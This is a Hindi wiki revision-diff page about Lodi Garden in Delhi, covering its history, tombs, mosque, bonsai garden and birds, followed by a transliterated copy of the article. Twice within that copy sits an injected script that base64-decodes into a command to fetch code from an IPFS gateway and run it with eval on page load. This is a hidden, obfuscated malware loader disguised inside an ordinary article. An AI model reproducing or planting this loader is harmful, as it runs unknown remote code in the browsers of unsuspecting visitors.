Difference between revisions of "लोदी बग़ीचा, दिल्ली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{राष्ट्रीय उद्यान और अभयारण्य}}" to "{{राष्ट्रीय उद्यान और अभयारण्य}} {{भारत गणराज्य}}")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[दिल्ली]] एक आकर्षक [[दिल्ली पर्यटन|पर्यटन स्थल]] है।
+
[[चित्र:Lodi-Gardens-Delhi.jpg|thumb|250px|लोदी बगीचा, [[दिल्ली]]]]
*सफदरजंग के मक़बरे से लोदी बग़ीचा 1 किलोमीटर पूर्व में स्थित है।  
+
'''लोदी बग़ीचा''' [[दिल्ली]] एक आकर्षक [[दिल्ली पर्यटन|पर्यटन स्थल]] है जो सफदरजंग के मक़बरे से 1 किलोमीटर पूर्व में स्थित है।  
 
*इस बाग़ का पुराना नाम 'लेडी विलिंगटन पार्क' था।  
 
*इस बाग़ का पुराना नाम 'लेडी विलिंगटन पार्क' था।  
*यहाँ के ख़ूबसूरत फव्वारे, तालाब, फूल और जॉगिंग ट्रैक सभी उम्र के लोगों को लुभाते हैं।  
+
*यहाँ के ख़ूबसूरत फ़व्वारे, तालाब, [[फूल]] और जॉगिंग ट्रैक सभी उम्र के लोगों को लुभाते हैं।  
*लोदी बगीचा मूल रूप से गाँव था जिसके आस-पास 15वीं-16वीं शताब्दी के सैय्यद और [[लोदी वंश]] के स्मारक थे।  
+
*लोदी बगीचा मूल रूप से गाँव था जिसके आस-पास 15वीं-16वीं शताब्दी के [[सैय्यद वंश|सैय्यद]] और [[लोदी वंश]] के स्मारक थे।  
*इस गाँव को अंग्रेज़ों ने सन [[1936]] में दुबारा बसाया।  
+
*इस गाँव को [[अंग्रेज़|अंग्रेज़ों]] ने सन् [[1936]] में दुबारा बसाया।  
 
*यहाँ राष्ट्रीय बोजाई बगीचा भी है जहाँ बोजाई का अच्छा संग्रह है।  
 
*यहाँ राष्ट्रीय बोजाई बगीचा भी है जहाँ बोजाई का अच्छा संग्रह है।  
*लोदी बगीचे में पेड़ों की विभिन्न प्रजातियाँ, रोज बगीचा और ग्रीन हाउस है जहाँ पर पौधों का रखा जाता है।
+
*लोदी बगीचे में पेड़ों की विभिन्न प्रजातियाँ, रोज़ बगीचा और ग्रीन हाउस है जहाँ पर पौधों का रखा जाता है।
*यहाँ पूरे वर्ष अनेक प्रकार के पक्षी देखे जा सकते हैं।  
+
*यहाँ पूरे [[वर्ष]] अनेक प्रकार के पक्षी देखे जा सकते हैं।  
 
*बगीचे के बीच में बारा गुंबद नामक मस्जिद है जो 1494 में बनाई गई थी।  
 
*बगीचे के बीच में बारा गुंबद नामक मस्जिद है जो 1494 में बनाई गई थी।  
 
*इस बगीचे में शीश गुंबद, मोहम्मद शाह का मक़बरा और सिकंदर लोदी का मक़बरा है।  
 
*इस बगीचे में शीश गुंबद, मोहम्मद शाह का मक़बरा और सिकंदर लोदी का मक़बरा है।  
 
*यहाँ सर्दियों के दिनों में बड़ी संख्या में लोग आते हैं।
 
*यहाँ सर्दियों के दिनों में बड़ी संख्या में लोग आते हैं।
  
{{लेख प्रगति
+
{{प्रचार}}
|आधार=
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|प्रारम्भिक=प्रारम्भिक1
+
==वीथिका==
|माध्यमिक=
+
<gallery>
|पूर्णता=
+
चित्र:Delhi-Lodi-Garden-7.jpg|मोहम्मद शाह का मक़बरा, लोदी बगीचा, [[दिल्ली]]
|शोध=
+
चित्र:Muhammad-Shah-Tomb-Lodi-Garden-1.jpg|मोहम्मद शाह का मक़बरा, लोदी बगीचा, [[दिल्ली]]
}}
+
चित्र:Bada-Gumbad-Lodi-Garden.jpg|बारा गुंबद, लोदी बगीचा, [[दिल्ली]]
 +
चित्र:Sheesh-Gumbad-Lodi-Garden.jpg|शीश गुंबद, लोदी बगीचा, [[दिल्ली]]
 +
चित्र:Muhammad-Shah-Tomb-Lodi-Garden.jpg|मोहम्मद शाह का मक़बरा, लोदी बगीचा, [[दिल्ली]]
 +
चित्र:Sikandar-Lodhi-Tomb-Lodi-Garden.jpg|सिकंदर लोदी का मक़बरा, लोदी बगीचा, [[दिल्ली]]
 +
</gallery>
 +
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{दिल्ली}}
 
{{दिल्ली}}
{{राष्ट्रीय उद्यान और अभयारण्य}}
 
{{भारत गणराज्य}}
 
 
[[Category:दिल्ली]]
 
[[Category:दिल्ली]]
 
[[Category:दिल्ली के पर्यटन स्थल]]
 
[[Category:दिल्ली के पर्यटन स्थल]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
__INDEX__
 
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
 
__INDEX__
 
__INDEX__

Latest revision as of 10:12, 12 October 2016

[[chitr:Lodi-Gardens-Delhi.jpg|thumb|250px|lodi bagicha, dilli]] lodi bagicha dilli ek akarshak paryatan sthal hai jo saphadarajang ke maqabare se 1 kilomitar poorv mean sthit hai.

  • is bag ka purana nam 'ledi viliangatan park' tha.
  • yahaan ke khoobasoorat favvare, talab, phool aur j aaugiang traik sabhi umr ke logoan ko lubhate haian.
  • lodi bagicha mool roop se gaanv tha jisake as-pas 15vian-16vian shatabdi ke saiyyad aur lodi vansh ke smarak the.
  • is gaanv ko aangrezoan ne sanh 1936 mean dubara basaya.
  • yahaan rashtriy bojaee bagicha bhi hai jahaan bojaee ka achchha sangrah hai.
  • lodi bagiche mean pe doan ki vibhinn prajatiyaan, roz bagicha aur grin haus hai jahaan par paudhoan ka rakha jata hai.
  • yahaan poore varsh anek prakar ke pakshi dekhe ja sakate haian.
  • bagiche ke bich mean bara guanbad namak masjid hai jo 1494 mean banaee gee thi.
  • is bagiche mean shish guanbad, mohammad shah ka maqabara aur sikandar lodi ka maqabara hai.
  • yahaan sardiyoan ke dinoan mean b di sankhya mean log ate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>